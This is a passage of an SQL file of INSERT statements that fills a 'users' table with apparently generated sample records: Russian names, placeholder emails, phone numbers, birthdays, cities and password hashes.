,('Юрий','Волчкевич','<EMAIL>',5826283675,'m','1981-10-15','Воронеж',NULL,'1e65c000a98a92396d4ef31ec8d7740cbf578830','2020-09-25 22:09:27.0')
,('Евгений','Волынкин','<EMAIL>',9707035248,'m','1981-03-19','Саратов',NULL,'3627f911a7a4141f007ff0d25aa85f061f734742','2020-09-25 22:09:27.0')
,('Владимир','Воробьев','<EMAIL>',8788528067,'m','1980-06-23','Красноярск',NULL,'0be3ef277eac3ac46d547b579848cea67e075952','2020-09-25 22:09:27.0')
,('Дмитрий','Лопухов','<EMAIL>',7107508285,'m','1983-11-03','Нижний Новгород',NULL,'5d3e5e579aa758ea28c1f53a6de174ee1f714701','2020-09-25 22:09:27.0')
,('Ольга','Лохмачева','<EMAIL>',6146928162,'f','1980-01-23','Самара',NULL,'f89b2d6443e511fd742d16a5404b19d541f89f10','2020-09-25 22:09:27.0')
,('Маргарита','Овчинникова','<EMAIL>',5013560236,'f','1981-05-20','Казань',NULL,'14aac374085e2782a8f1510f1bf49722b040731c','2020-09-25 22:09:27.0')
,('Вячеслав','Погорельский','<EMAIL>',6068012327,'m','1988-01-05','Пермь',NULL,'5530cf46cf0b1b5e787723e83012f93a5cd6b832','2020-09-25 22:09:27.0')
,('Владимир','Полищук','<EMAIL>',6081230164,'m','1987-10-25','Ростов-на-Дону',NULL,'7ee4a9f5be784f551cfcb2d23698bc31b4e4069f','2020-09-25 22:09:27.0')
,('Игорь','Токарев','<EMAIL>',8843970434,'m','1985-07-08','Новосибирск',NULL,'a430faa2a1494af65cfa7cd72a7f46e1fad301c6','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Евгений','Турбин','<EMAIL>',6414312198,'m','1987-08-18','Москва',NULL,'1fa46ebf47f51c03b98c8379934b4b0182853ec3','2020-09-25 22:09:27.0')
,('Анна','Колтакова','<EMAIL>',9059884608,'f','1989-03-04','Пермь',NULL,'e59558fde6118d3eb58c5b624bedf28b41da0ac7','2020-09-25 22:09:27.0')
,('Максим','Попов','<EMAIL>',6549392162,'m','1989-05-01','Санкт-Петербург',NULL,'1bc1a0536d38b6216b74a2819436ba0a925206c8','2020-09-25 22:09:27.0')
,('Юлия','Черепнина','<EMAIL>',8361146361,'f','1982-04-09','Самара',NULL,'47c16b5079e4409b613bcedfe75fcfa8c486963f','2020-09-25 22:09:27.0')
,('Андрей','Мошкин','<EMAIL>',7586396136,'m','1980-04-06','Екатеринбург',NULL,'ebb1057b6e438535963f3706ba15dd6a2df8926b','2020-09-25 22:09:27.0')
,('Евгений','Бучнев','<EMAIL>',8482399498,'m','1982-01-29','Тюмень',NULL,'9aeec57f845984b9ec57d44acd8d4990b2f21824','2020-09-25 22:09:27.0')
,('Екатерина','Кретинина','<EMAIL>',5605843880,'f','1989-07-09','Пермь',NULL,'b1ac483a02563c28d48284145535076aa39931ab','2020-09-25 22:09:27.0')
,('Павел','Трунтаев','<EMAIL>',8608680584,'m','1986-03-07','Уфа',NULL,'e430a8c6a2f7272b9e5f295a7ecac609555be589','2020-09-25 22:09:27.0')
,('Юлия','Печенкина','<EMAIL>',1682297034,'f','1987-03-26','Краснодар',NULL,'8ac622757e94e702a3798d851b21d6d1d3ee5450','2020-09-25 22:09:27.0')
,('Михаил','Хрипков','<EMAIL>',4765849891,'m','1987-02-04','Новосибирск',NULL,'44c2349e85e97eda950d824a82ab37c2da75bf92','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Ольга','Черникова','<EMAIL>',3659256004,'f','1980-07-25','Самара',NULL,'151acd87edd4c6d68ce4a92bc846f2abeae49b8e','2020-09-25 22:09:27.0')
,('Максим','Бахтерев','<EMAIL>',7849899275,'m','1986-12-27','Санкт-Петербург',NULL,'4613c2845f696b03d37b801e0cdab710fb6beaea','2020-09-25 22:09:27.0')
,('Екатерина','Попова','<EMAIL>',9788815521,'f','1989-01-09','Нижний Новгород',NULL,'3a4548bbbbed1c9d604750295dd22b34b706427f','2020-09-25 22:09:27.0')
,('Марина','Свиридова','<EMAIL>',7449749232,'f','1982-12-26','Казань',NULL,'07dc7b613035be338b2d299bf481d9ced8731129','2020-09-25 22:09:27.0')
,('Сергей','Цурканов','<EMAIL>',9461404246,'m','1985-07-24','Казань',NULL,'4f2d890e00efe71d86b23d64aa3ab7c7f6c2262b','2020-09-25 22:09:27.0')
,('Алла','Толмачева','<EMAIL>',5057501481,'f','1984-08-18','Омск',NULL,'cd21e4ceb76f06cbe1d3ecd30345701dfc01f28c','2020-09-25 22:09:27.0')
,('Алексей','Суворов','<EMAIL>',2034001863,'m','1984-08-12','Санкт-Петербург',NULL,'7fe1c2e54c91bb20754abe19f3633ecb294f69ce','2020-09-25 22:09:27.0')
,('Виталия','Бредихина','<EMAIL>',5033419317,'f','1988-09-01','Пермь',NULL,'a1313b86956b58564bf1bc069cfdeaec107b235b','2020-09-25 22:09:27.0')
,('Елена','Бумакова','<EMAIL>',6621801231,'f','1987-01-10','Москва',NULL,'b29ff9bce316ab42dfe8b8ae997b551fd05ba3a4','2020-09-25 22:09:27.0')
,('Галина','Максимова','<EMAIL>',9315587169,'f','1988-05-14','Уфа',NULL,'3f88873d6babca57eb1c5371be6a431c415c6ae5','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Евгения','Мельченко','<EMAIL>',2634109732,'f','1981-07-24','Самара',NULL,'af711421307bf3ea53e2a1fd5c7cdc47bc0464d4','2020-09-25 22:09:27.0')
,('Татьяна','Переславцева','<EMAIL>',9437670910,'f','1985-08-23','Омск',NULL,'6da0975df3909e3928a20d54fbbca3c0361ff060','2020-09-25 22:09:27.0')
,('Татьяна','Ситало','<EMAIL>',2822890926,'f','1988-02-03','Санкт-Петербург',NULL,'e02ed0156bcadbc65c407e4f6d0c907449dcfb49','2020-09-25 22:09:27.0')
,('Ирина','Анисимова','<EMAIL>',6667018887,'f','1989-11-15','Нижний Новгород',NULL,'e08d50568524e1712fd178b2d453eccaec3497d9','2020-09-25 22:09:27.0')
,('Наталья','Домарева','<EMAIL>',4094890532,'f','1985-09-18','Уфа',NULL,'52bb52432e2afd23c8da1f5587ba6dcfc5321b3e','2020-09-25 22:09:27.0')
,('Ирина','Сидельникова','<EMAIL>',3198003378,'f','1988-03-18','Красноярск',NULL,'ecabdafeec47fe7ae2303f3482e875ec47a504aa','2020-09-25 22:09:27.0')
,('Ираида','Воронюк','<EMAIL>',6147416992,'f','1983-04-04','Москва',NULL,'efaf246cf8b3e0fe4795e9a6bc33e852dcf76bb2','2020-09-25 22:09:27.0')
,('Юлия','Азарова','<EMAIL>',5283489590,'f','1983-10-13','Казань',NULL,'c7f7a47fbda0cd6cd1e0d34265521b26dd561592','2020-09-25 22:09:27.0')
,('Мария','Ефимова','<EMAIL>',9077450643,'f','1988-06-04','Казань',NULL,'2cddeecac91feeb2f03c5b2eb5a0cda8407bf25b','2020-09-25 22:09:27.0')
,('Юлия','Кондратьева','<EMAIL>',4854790930,'f','1981-07-19','Уфа',NULL,'1e570efd00e3262785cf1dcd9eb0dc4ecb6a213d','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Юлия','Косарева','<EMAIL>',5239735195,'f','1987-11-04','Новосибирск',NULL,'659c44b7d1deec5ba15d5c2a24345a655f536cf8','2020-09-25 22:09:27.0')
,('Ирина','Лакомова','<EMAIL>',8902784216,'f','1981-11-11','Санкт-Петербург',NULL,'b48da6b9f87aa771566ab1d75cb69081105f6a50','2020-09-25 22:09:27.0')
,('Анна','Полуэктова','<EMAIL>',8414878509,'f','1981-10-20','Уфа',NULL,'2d10eec8cdac3f29976908c3efa65aed77028732','2020-09-25 22:09:27.0')
,('Ольга','Никулина','<EMAIL>',9347973825,'f','1989-09-28','Омск',NULL,'8113bb2b1039acc5d314fb74840c11963c2d0671','2020-09-25 22:09:27.0')
,('Юлия','Максименко','<EMAIL>',4777653528,'f','1987-11-29','Новосибирск',NULL,'49c2e20c7e932772449c133770fcb6fababacdae','2020-09-25 22:09:27.0')
,('Татьяна','Асеева','<EMAIL>',9035161534,'f','1989-05-27','Волгоград',NULL,'5009a649664092e862d0eaaf055391e453889bbb','2020-09-25 22:09:27.0')
,('Екатерина','Шипилова','<EMAIL>',4366159925,'f','1984-11-30','Пермь',NULL,'94b83db9e43e7aed7fa9bcf13adc71aa179f89cb','2020-09-25 22:09:27.0')
,('Елена','Янкова','<EMAIL>',7266747785,'f','1988-11-26','Новосибирск',NULL,'2cee62ceb700cc6f95e628d60a75b17b1732ef65','2020-09-25 22:09:27.0')
,('Евгений','Красавин','<EMAIL>',7366490172,'m','1984-10-16','Ростов-на-Дону',NULL,'b02744a3459bf40c24434c311c7028547ad70889','2020-09-25 22:09:27.0')
,('Анна','Яньшина','<EMAIL>',8016989162,'f','1984-11-18','Воронеж',NULL,'3314213f61429d374db27ef36b8caf681f649050','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Наталья','Мироненко','<EMAIL>',5606350937,'f','1986-07-13','Екатеринбург',NULL,'012724188466775fd1b41ce9803a36dca24a63b6','2020-09-25 22:09:27.0')
,('Людмила','Дадонова','<EMAIL>',9375852898,'f','1982-06-07','Краснодар',NULL,'9f3614ed85067d90f9a882975f6a8d4dfc3f43df','2020-09-25 22:09:27.0')
,('Ольга','Мордасова','<EMAIL>',6523490247,'f','1981-01-16','Краснодар',NULL,'44ffb111616d23edfc480f0639b63d4d065147aa','2020-09-25 22:09:27.0')
,('Елена','Рыжкова','<EMAIL>',5301390113,'f','1986-06-25','Новосибирск',NULL,'c5e9fcc1e5c3991df06be270bdc1ccb4cd8c5ac1','2020-09-25 22:09:27.0')
,('Екатерина','Богомолова','<EMAIL>',8271364242,'f','1982-03-10','Пермь',NULL,'99d6158bc261ca00d6dcf348dbf9ea368a1ae46b','2020-09-25 22:09:27.0')
,('Марина','Голощапова','<EMAIL>',3192842536,'f','1988-06-07','Москва',NULL,'7ba41712fe6615ae0cf36ee45daf697ccb143563','2020-09-25 22:09:27.0')
,('Инна','Дибцева','<EMAIL>',4447992090,'f','1986-12-17','Ростов-на-Дону',NULL,'3d7d5ac699eef8151fe1b7bfd533a321b56bb59d','2020-09-25 22:09:27.0')
,('Дмитрий','Попов','<EMAIL>',7897075774,'m','1981-08-23','Ростов-на-Дону',NULL,'176936e9534c8e4b7fa4e2823745770ee0b64880','2020-09-25 22:09:27.0')
,('Галина','Рукавицына','<EMAIL>',2396829153,'f','1986-03-14','Новосибирск',NULL,'e396e8928248b9331ee11b9c0c5a4653d6ad2fad','2020-09-25 22:09:27.0')
,('Никита','Рыкунов','<EMAIL>',8866042922,'m','1981-09-03','Москва',NULL,'5750b294231512ca402800e4eef400036e08507d','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Анастасия','Рыкунова','<EMAIL>',9518059825,'f','1989-06-12','Красноярск',NULL,'deb3e4b9c818260e9adf17b225f45234390713cf','2020-09-25 22:09:27.0')
,('Юрий','Саблин','<EMAIL>',9061846141,'m','1988-02-24','Тюмень',NULL,'dc4a7a560f689bf62ddc9aa22bbd64becceffca6','2020-09-25 22:09:27.0')
,('Алексей','Самсонов','<EMAIL>',6284148195,'m','1981-07-20','Екатеринбург',NULL,'3b802df74686705a1d5ed6c253b0d588bb02103c','2020-09-25 22:09:27.0')
,('Екатерина','Соколова','<EMAIL>',6686191671,'f','1984-09-14','Волгоград',NULL,'32800bf3d9a44c1e74c4c697989d4d265c100716','2020-09-25 22:09:27.0')
,('Татьяна','Афанасьева','<EMAIL>',4804069885,'f','1987-05-15','Москва',NULL,'fb762d0873e171610eace7e45c4728888990524d','2020-09-25 22:09:27.0')
,('Алексей','Болгов','<EMAIL>',9391944702,'m','1987-11-26','Омск',NULL,'581e202c66b30b0c2382af4e8d3eac3c831d0ddd','2020-09-25 22:09:27.0')
,('Дмитрий','Древаль','<EMAIL>',8197243501,'m','1983-01-19','Краснодар',NULL,'6b1258bd81342cb6d68ecb3b2fbeeba913bf70f3','2020-09-25 22:09:27.0')
,('Максим','Дубатовкин','<EMAIL>',1835522933,'m','1985-10-13','Москва',NULL,'0e903f53c20657667ee04e67eba9bf70d13e8248','2020-09-25 22:09:27.0')
,('Сергей','Простаков','<EMAIL>',3912001914,'m','1980-03-11','Воронеж',NULL,'e0d1f2c5ea78335ecc106a2d371616cedfc21505','2020-09-25 22:09:27.0')
,('Александр','Пономарев','<EMAIL>',9018710320,'m','1986-12-08','Саратов',NULL,'8b8123b5ccb6aa6c06dbda8c75f91f62f44d5fe3','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Андрей','Косяков','<EMAIL>',1155125246,'m','1981-11-12','Казань',NULL,'965cbe4558dce829055d547a3866f7d982997940','2020-09-25 22:09:27.0')
,('Дмитрий','Косяков','<EMAIL>',4947082181,'m','1983-03-05','Краснодар',NULL,'460c92435c10f0ae5c3bb7596bc3ed757cbee69f','2020-09-25 22:09:27.0')
,('Людмила','Скаба','<EMAIL>',1236239169,'f','1989-01-28','Воронеж',NULL,'a1cc4ab2add1ed470fa93495ece29978a51f8c00','2020-09-25 22:09:27.0')
,('Дмитрий','Смольянинов','<EMAIL>',2249473665,'m','1987-10-17','Тольятти',NULL,'1976170ea8cb1a94b5572e5e67baad29c1a569fa','2020-09-25 22:09:27.0')
,('Вячеслав','Допперт','<EMAIL>',8301549057,'m','1981-10-02','Тюмень',NULL,'5de1843e1bce099134f41d1522c17363245fc778','2020-09-25 22:09:27.0')
,('Елена','Стрыгина','<EMAIL>',1086531264,'f','1988-05-04','Волгоград',NULL,'deddfab8a1ec0d8b3395b3d692ddae01aafcfc22','2020-09-25 22:09:27.0')
,('Сергей','Анисимов','<EMAIL>',5525263441,'m','1982-03-13','Саратов',NULL,'e6582cbf8420fc471078f4e118fade0afb9830eb','2020-09-25 22:09:27.0')
,('Вячеслав','Гамов','<EMAIL>',7393531761,'m','1982-11-10','Красноярск',NULL,'4fdd2cbb6dfa134449dc7c0186f8ab86c56058f2','2020-09-25 22:09:27.0')
,('Юрий','Довка','<EMAIL>',6139086790,'m','1980-01-29','Саратов',NULL,'c2230720a13c0dbe4123d982a09fdfb421d85ae1','2020-09-25 22:09:27.0')
,('Александр','Калинин','<EMAIL>',3392340667,'m','1982-10-29','Воронеж',NULL,'1e32b1e9e9066c24064cafebf9ed40aaf3aa647b','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Николай','Пивоваров','<EMAIL>',7988872107,'m','1988-05-20','Краснодар',NULL,'204b2aedb33e12cdf4a3a0e9737e945870b17081','2020-09-25 22:09:27.0')
,('Алексей','Тимошенко','<EMAIL>',6741632937,'m','1989-09-17','Саратов',NULL,'ce449325f74a523bc1556da3d19921c684259925','2020-09-25 22:09:27.0')
,('Екатерина','Богомолова','<EMAIL>',3151907707,'f','1988-12-27','Тольятти',NULL,'f1967dc12ed090fa0dd7259e2485cce97865e4d1','2020-09-25 22:09:27.0')
,('Марина','Голощапова','<EMAIL>',7783646176,'f','1986-02-11','Екатеринбург',NULL,'60ada1812162902fdf036cd8f41aed0b1ae31866','2020-09-25 22:09:27.0')
,('Инна','Дибцева','<EMAIL>',4963297188,'f','1986-01-05','Волгоград',NULL,'74f7ad69beb17f40608046522c6cfe2ab75ffdfb','2020-09-25 22:09:27.0')
,('Дмитрий','Попов','<EMAIL>',9517280949,'m','1982-02-26','Красноярск',NULL,'c99c810a5782926b16d2aae0f5a029c3ca0de755','2020-09-25 22:09:27.0')
,('Галина','Рукавицына','<EMAIL>',3923826386,'f','1984-11-06','Челябинск',NULL,'3a19575039593db8300b30e3051cf15890783bbc','2020-09-25 22:09:27.0')
,('Никита','Рыкунов','<EMAIL>',8487221955,'m','1984-06-03','Краснодар',NULL,'404bb0046780c0377ef1e96ce9001a701668c6c6','2020-09-25 22:09:27.0')
,('Анастасия','Рыкунова','<EMAIL>',8066940781,'f','1986-02-13','Тюмень',NULL,'2d9f4c408a47c268a31fc39809d2fb04a2a04ec3','2020-09-25 22:09:27.0')
,('Юрий','Саблин','<EMAIL>',8186433808,'m','1982-11-23','Уфа',NULL,'d0f98fc4b115f0ca2122f1ea0f53cdff006e0a90','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Алексей','Самсонов','<EMAIL>',1437600801,'m','1986-03-09','Самара',NULL,'a6042fbaffba5d97f05baf9bfe6163722d1d640d','2020-09-25 22:09:27.0')
,('Екатерина','Соколова','<EMAIL>',9798286372,'f','1982-08-25','Пермь',NULL,'60fb33d672eff5d474f18309e11320f40b7e7b4f','2020-09-25 22:09:27.0')
,('Татьяна','Афанасьева','<EMAIL>',5794027202,'f','1981-09-06','Волгоград',NULL,'9967a9836ae9a490691dc6a7abf921c13de7693b','2020-09-25 22:09:27.0')
,('Алексей','Болгов','<EMAIL>',4243478042,'m','1986-08-21','Челябинск',NULL,'f0fe0f1cc166c63a8a8ec4ed6b0d56d4a6dc12c5','2020-09-25 22:09:27.0')
,('Дмитрий','Древаль','<EMAIL>',7191538491,'m','1983-05-17','Красноярск',NULL,'c94230c5967832c1cab80d57668a6d2418f3ce0e','2020-09-25 22:09:27.0')
,('Максим','Дубоваткин','<EMAIL>',5466692275,'m','1984-05-26','Волгоград',NULL,'81d0d1ebcd2d75030d7f2fceab8e229e2795b1f2','2020-09-25 22:09:27.0')
,('Сергей','Простаков','<EMAIL>',3805318987,'m','1987-02-03','Уфа',NULL,'b896871061ded2bcdd77430613f262046c0465e5','2020-09-25 22:09:27.0')
,('Александр','Пономарев','<EMAIL>',9972401583,'m','1984-07-17','Пермь',NULL,'4ecb30007604ee7baf41e5b68cf4bb5e45cfb9c9','2020-09-25 22:09:27.0')
,('Максим','Паршин','<EMAIL>',1672124574,'m','1985-04-26','Санкт-Петербург',NULL,'7bc86a9ac9b93f30c1af49c7423cc27c2773bd57','2020-09-25 22:09:27.0')
,('Алексей','Петров','<EMAIL>',6387066678,'m','1987-06-13','Краснодар',NULL,'6b3dd04daee595084ee9ff21279fe2b27cf87d3b','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Николай','Сидоров','<EMAIL>',4521952112,'m','1984-09-21','Самара',NULL,'6c99e35fcb1313640ecc9ef074767cd912cb5fa3','2020-09-25 22:09:27.0')
,('Александр','Ворфоломеев','<EMAIL>',4552946215,'m','1983-09-08','Челябинск',NULL,'9e27dbd35bf80d7b000b78987f8136742db78694','2020-09-25 22:09:27.0')
,('Алексей','Алехин','<EMAIL>',5019199432,'m','1981-03-28','Екатеринбург',NULL,'162f709959774d806963d0f4cf7946c3fd2d8a48','2020-09-25 22:09:27.0')
,('Екатерина','Паршина','<EMAIL>',8393364396,'f','1984-05-16','Челябинск',NULL,'6213391ec7ef13d231e308d9e37d27bc3826f5d0','2020-09-25 22:09:27.0')
,('Наталья','Трубицына','<EMAIL>',6376414090,'f','1987-08-20','Москва',NULL,'c416fe919541a2135942fae312c6b9fa450b9910','2020-09-25 22:09:27.0')
,('Екатерина','Паршина','<EMAIL>',7506356015,'f','1987-08-27','Челябинск',NULL,'59c2c1bab5ce4f157ca65c0008d9dded06f77747','2020-09-25 22:09:27.0')
,('Евгения','Кривцова','<EMAIL>',1633500921,'f','1987-11-28','Красноярск',NULL,'d39dd4390bdcd9c5d439c0fe6a3c4a327af221eb','2020-09-25 22:09:27.0')
,('Анастасия','Бурмистрова','<EMAIL>',9894901275,'f','1980-11-03','Уфа',NULL,'b703cb35fb2298673e577f461482a2faeaaf1eab','2020-09-25 22:09:27.0')
,('Елена','Воронова','<EMAIL>',2018695545,'f','1980-04-12','Тольятти',NULL,'b00c41bb74b9ae30d9513d48a1245e618fc5b210','2020-09-25 22:09:27.0')
,('Наталья','Заводскова','<EMAIL>',3372167202,'f','1986-10-29','Пермь',NULL,'1b79c1723c0a8c65120d12a6be69a8fb9970a5b6','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Сергей','Воронин','<EMAIL>',2624066456,'m','1985-06-21','Тюмень',NULL,'d92336e60a1c39ef40a442db8758173836d127ad','2020-09-25 22:09:27.0')
,('Юлия','Баранова','<EMAIL>',8826412568,'f','1986-04-11','Челябинск',NULL,'6b3a60494a2592cf1f643059de580662cc6cc524','2020-09-25 22:09:27.0')
,('Марина','Семикоз','<EMAIL>',2822165316,'f','1981-04-23','Самара',NULL,'b8d39e2a6a1b8add765f7f8cc02785f15d692c1c','2020-09-25 22:09:27.0')
,('Андрей','Буланый','<EMAIL>',1823731974,'m','1989-06-04','Казань',NULL,'83097b2b4d64b3e3c90487facd26beb9515434f4','2020-09-25 22:09:27.0')
,('Мария','Тафинцева','<EMAIL>',9835391400,'f','1987-02-07','Екатеринбург',NULL,'97f853a5ca84ffbd28b671b50e4da74c31091289','2020-09-25 22:09:27.0')
,('Ольга','Аксененкова','<EMAIL>',3841390714,'f','1984-05-14','Пермь',NULL,'c559cb1c9fc131914c12fe954f336adfcfce9dc0','2020-09-25 22:09:27.0')
,('Виктория','Лунева','<EMAIL>',7213293360,'f','1985-04-28','Уфа',NULL,'8d9633614bbba01c2321c8ae792e81076353018e','2020-09-25 22:09:27.0')
,('Александр','Федоров','<EMAIL>',5226134225,'m','1986-12-29','Саратов',NULL,'bc80127d933e0d328ecdae39339f46eee4466085','2020-09-25 22:09:27.0')
,('Любовь','Корчагина','<EMAIL>',9967628912,'f','1980-09-13','Омск',NULL,'83ddcad57c2f0fdad119f7ef5b0868b5bbc6db39','2020-09-25 22:09:27.0')
,('Ольга','Щербинина','<EMAIL>',9827001278,'f','1983-02-13','Нижний Новгород',NULL,'7d73b3cf8f25f66e0dcda5cdf5b86cc95a40087f','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Александр','Лебедев','<EMAIL>',1243478465,'m','1982-09-05','Воронеж',NULL,'7d5b5340ccd8aa195530d45b0d531874c3157744','2020-09-25 22:09:27.0')
,('Павел','Островерхов','<EMAIL>',9958667317,'m','1980-04-20','Ростов-на-Дону',NULL,'38ceff79c9a3dc3022a29d4a321b8e1c1f9d573c','2020-09-25 22:09:27.0')
,('Юлия','Гаршина','<EMAIL>',4644317051,'f','1982-11-19','Челябинск',NULL,'0705130b93d6ad48ed4a4cf1121b6c2da22451a5','2020-09-25 22:09:27.0')
,('Юлия','Якушева','<EMAIL>',5124099962,'f','1986-12-01','Казань',NULL,'a4855604e4b371d4fc08269aadf4e53f41572af2','2020-09-25 22:09:27.0')
,('Александр','Поротиков','<EMAIL>',2443934792,'m','1989-01-27','Ростов-на-Дону',NULL,'7736a217376b568df8b3ccf9abb2b33d369651ab','2020-09-25 22:09:27.0')
,('Антон','Гончаров','<EMAIL>',3353138089,'m','1984-05-12','Воронеж',NULL,'5e89b185348a2952d14d63ca8a8e918cbe76ffb6','2020-09-25 22:09:27.0')
,('Юлия','Захарова','<EMAIL>',9601298201,'f','1988-05-29','Тюмень',NULL,'29836521a8aaf747e81a4b73815567d2f0c391f2','2020-09-25 22:09:27.0')
,('Елена','Тарасова','<EMAIL>',3135058629,'f','1985-05-20','Челябинск',NULL,'1a774e0a50f50122bf651dfcac8fbd7093fbadfe','2020-09-25 22:09:27.0')
,('Татьяна','Белоусова','<EMAIL>',9137682198,'f','1989-04-11','Пермь',NULL,'6612e2fcf05eb06abf6a270836c6bb0929881d2d','2020-09-25 22:09:27.0')
,('Кристина','Комова','<EMAIL>',7535680736,'f','1983-08-14','Санкт-Петербург',NULL,'bb35c705937669867fcb722070e7beb2d10ab622','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Максим','Никитин','<EMAIL>',7735098294,'m','1980-05-29','Краснодар',NULL,'ae2706b4f4b393f95331b1686ed391bc4d5c997a','2020-09-25 22:09:27.0')
,('Оксана','Снегирева','<EMAIL>',7267503662,'f','1986-05-20','Волгоград',NULL,'117e128e47bf9990fb42667c532fea870148154e','2020-09-25 22:09:27.0')
,('Виктория','Руднева','<EMAIL>',6437005614,'f','1981-06-21','Пермь',NULL,'e161196978199abbf0aae9db3646c92160edb97a','2020-09-25 22:09:27.0')
,('Елена','Аржанова','<EMAIL>',3264294858,'f','1980-11-03','Тюмень',NULL,'27a45adcbb383228b8998eb3074059471a3143f0','2020-09-25 22:09:27.0')
,('Федор','Шипко','<EMAIL>',8854406327,'m','1989-05-14','Самара',NULL,'f6576f732765b8b40fd758bcc0a83b65dea45ca1','2020-09-25 22:09:27.0')
,('Юлия','Тамбовцева','<EMAIL>',5792854326,'f','1983-01-10','Саратов',NULL,'27c2a6980f55455a7de39f0f4afbe96a112ae5c7','2020-09-25 22:09:27.0')
,('Ольга','Козаренко','<EMAIL>',8076928589,'f','1981-09-01','Краснодар',NULL,'8da5db5f87ef06c2f7fb67846068d728e1f4fde2','2020-09-25 22:09:27.0')
,('Наталья','Волкова','<EMAIL>',3467878579,'f','1985-12-07','Омск',NULL,'60c3e33d3702766312b99c42d1be3a98b5e3eeaa','2020-09-25 22:09:27.0')
,('Юлия','Лысакова','<EMAIL>',6804310209,'f','1981-06-26','Саратов',NULL,'3cfb6181608ca073d4d59432c71d36ce3fb1bdbe','2020-09-25 22:09:27.0')
,('Владимир','Почепцов','<EMAIL>',4101819985,'m','1987-01-02','Нижний Новгород',NULL,'c3b0adc093cbc45a0e02275a13a1f7e3609b257e','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Евгения','Конникова','<EMAIL>',4578422856,'f','1989-10-09','Волгоград',NULL,'9f85a0b32ae7fb3e952fa6f38de5a5405fc03810','2020-09-25 22:09:27.0')
,('Наталья','Козлитина','<EMAIL>',5302291765,'f','1983-03-02','Новосибирск',NULL,'c75642bc2173f416bae563603aef9c3cee7a220e','2020-09-25 22:09:27.0')
,('Марат','Назмиев','<EMAIL>',3696664396,'m','1989-02-16','Санкт-Петербург',NULL,'632cad88930380e011ef6423ac7a615cb62d81c7','2020-09-25 22:09:27.0')
,('Дмитрий','Тимашов','<EMAIL>',4771920220,'m','1983-02-13','Тюмень',NULL,'38860af616b46f31444b2e0e570318a3b6491f77','2020-09-25 22:09:27.0')
,('Александр','Маричев','<EMAIL>',1703242914,'m','1981-08-01','Казань',NULL,'6403618b2d91965c995eeb165fb1810c5494a3e1','2020-09-25 22:09:27.0')
,('Дина','Савельева','<EMAIL>',1277342028,'f','1987-12-03','Ростов-на-Дону',NULL,'1e031de4f2b7a76c2f622b63cb1c6844c90094ec','2020-09-25 22:09:27.0')
,('Федор','Шипко','<EMAIL>',5234996624,'m','1989-02-21','Санкт-Петербург',NULL,'9f02e6161b06ca3568c93d900f54cf24334c6c97','2020-09-25 22:09:27.0')
,('Василий','Безрученко','<EMAIL>',3877536636,'m','1982-04-26','Санкт-Петербург',NULL,'8b70f86d265f5e021b157d3ead188efb0ea3374f','2020-09-25 22:09:27.0')
,('Дмитрий','Литаврин','<EMAIL>',9947066870,'m','1983-05-10','Омск',NULL,'5ea7a3f00a784345a7c7df7dbf303921565c4bf2','2020-09-25 22:09:27.0')
,('Константин','Стародубцев','<EMAIL>',9286831036,'m','1986-08-23','Волгоград',NULL,'fabb15a627158fbc7f8be2119755ef0ecf08e81a','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Ольга','Кузнецова','<EMAIL>',3532624836,'f','1986-09-15','Нижний Новгород',NULL,'0558138813a372455cce703fefc719b65604da68','2020-09-25 22:09:27.0')
,('Антон','Борников','<EMAIL>',7377444639,'m','1983-02-10','Казань',NULL,'73351c9bf23a7e4e03f29ebd37b949ae1b866d09','2020-09-25 22:09:27.0')
,('Роман','Тарарыков','<EMAIL>',3451661646,'m','1988-04-13','Саратов',NULL,'ab4de688bf85cf865982dc2f2dc5a7e062ba54e5','2020-09-25 22:09:27.0')
,('Ольга','Ищенко','<EMAIL>',1132812314,'f','1985-12-04','Екатеринбург',NULL,'843d6df418382066775420211bf9f923b6885c62','2020-09-25 22:09:27.0')
,('Павел','Трунтаев','<EMAIL>',2312476133,'m','1985-05-21','Тольятти',NULL,'a34f88e21214740c1f0713a0b7158f035371ae52','2020-09-25 22:09:27.0')
,('Марина','Власова','<EMAIL>',5978627731,'f','1983-09-18','Санкт-Петербург',NULL,'a90f3046a469a20d596d46f5868a3236cb56b410','2020-09-25 22:09:27.0')
,('Сергей','Беляев','<EMAIL>',2489356708,'m','1986-07-11','Уфа',NULL,'78239b73d2286ecc07f0931666564f334b39bf0e','2020-09-25 22:09:27.0')
,('Татьяна','Морозова','<EMAIL>',8806637099,'f','1989-07-02','Екатеринбург',NULL,'ef981b22143faa2ddd2e3e7938bf604de1020059','2020-09-25 22:09:27.0')
